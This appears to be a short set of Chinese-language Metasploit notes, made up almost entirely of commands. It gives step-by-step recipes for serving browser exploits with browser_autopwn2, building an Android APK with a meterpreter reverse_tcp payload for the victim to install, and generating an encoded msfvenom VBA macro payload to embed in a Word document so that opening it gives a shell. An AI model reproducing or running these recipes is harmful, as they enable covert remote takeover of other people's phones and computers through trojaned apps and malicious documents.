auxiliary/server/browser_autopwn2模块

msf > use auxiliary/server/browser_autopwn2

msf auxiliary(browser_autopwn2) > set srvport 80

msf auxiliary(browser_autopwn2) > set uripath /

msf auxiliary(browser_autopwn2) > exploit

通过浏览器，去访问http://192.168.80.163/

msf > kill 0  关闭时，只需要kill 0

生成安卓apk

msf > use payload/android/meterpreter/reverse_tcp

msf payload(reverse_tcp) > set lhost 192.168.80.163

msf payload(reverse_tcp) > generate -p android -f a.apk -t raw

---

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.80.163

msf exploit(handler) > exploit

在手机上安装a.apk文件。

VBScript感染方式

root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe

生成2部分内容：①VBA代码 ②十六进制的payload

利用过程：

第一部分粘入VBA代码(视图--宏--创建)

第二部分粘入word文档正文

打开word文档，MSF会获得目标主机的shell。